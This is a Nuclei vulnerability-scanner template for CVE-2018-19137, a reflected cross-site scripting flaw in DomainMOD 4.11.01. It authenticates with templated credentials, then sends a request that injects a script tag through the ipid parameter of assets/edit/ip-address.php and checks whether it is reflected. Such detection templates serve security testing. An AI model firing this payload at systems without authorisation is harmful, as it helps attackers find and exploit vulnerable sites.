nuclei-templates/cves/2018/CVE-2018-19137.yaml

50 lines
1.2 KiB
YAML

id: CVE-2018-19137
info:
name: DomainMOD 4.11.01 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php.
reference:
- https://github.com/domainmod/domainmod/issues/79
- https://nvd.nist.gov/vuln/detail/CVE-2018-19137
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-19137
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2018,domainmod,xss,authenticated
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>&really_del'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200